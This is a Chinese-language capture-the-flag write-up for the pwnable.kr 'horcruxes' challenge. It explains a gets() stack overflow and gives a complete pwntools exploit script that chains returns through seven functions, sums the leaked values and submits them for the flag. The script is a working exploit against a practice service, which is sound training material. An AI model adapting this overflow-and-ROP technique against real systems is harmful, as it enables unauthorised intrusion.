pwnable.kr 之 horcruxes

gets(s)栈溢出，且没有canary，没有PIE

本来想的是通过栈溢出直接跳到 if 内部输出flag，不过其地址为0x80A010B结合gets函数遇到回车(‘\x0a’)结束输入的特性，无法将地址0x80A010B写到返回地址上去。这个一步到位的方法pass。

从init_ABCDEFG函数中得到sub=a+b+c+d+e+f+g，且ABCDEFG函数的地址为0x809xxxx，可以操作。

那么问题的解决方法就变成了，通过栈溢出分别跳转到函数ABCDEFG中获得abcdefg从而得到sum，进入if分支读取flag

#coding:utf-8

# from libformatstr import FormatStr
# py64 = FormatStr(isx64=1) 
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))
from pwn import *
import sys

local = 0
context.terminal=['tmux','splitw','-h']
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./horcruxes')
    # p = process(argv=['',pay])
    # p = process(["./ld.so","./easygame"],env={"LD_PRELOAD":"./libc.so.6"})
else:
    p = remote("pwnable.kr","9032")

#内存地址随机化
def debug(addr=0,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        print "breakpoint_addr --> " + hex(text_base + 0x202040)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr))) 

sd = lambda s    :p.send(s)
rc = lambda s    :p.recv(s)
sl = lambda s    :p.sendline(s)
ru = lambda s    :p.recvuntil(s)
sda = lambda a,s :p.sendafter(a,s)
sla = lambda a,s :p.sendlineafter(a,s)

def leak(name,addr):
	log.info(name + " --> %s",hex(addr))

A = 0x0809FE4B
B = 0x0809FE6A
C = 0x0809FE89
D = 0x0809FEA8
E = 0x0809FEC7
F = 0x0809FEE6
G = 0x0809FF05
main = 0x0809FF24

sla("Menu:","12")
pay = 0x78*'a'
pay += p32(A) + p32(B) + p32(C) + p32(D) + p32(E) + p32(F) + p32(G) + p32(0x809FFFC)
#gdb.attach(p,"b *0x80A00EE")
sla("earned? : ",pay)
def get_rand():
    ru("(EXP +")
    return int(ru(")")[:-1],10)
a = get_rand()
b = get_rand()
c = get_rand()
d = get_rand()
e = get_rand()
f = get_rand()
g = get_rand()
sum = a+b+c+d+e+f+g

sla("Menu:",'12')
#gdb.attach(p,"b *0x80A00EE")
sla("earned? : ",str(sum))
p.interactive()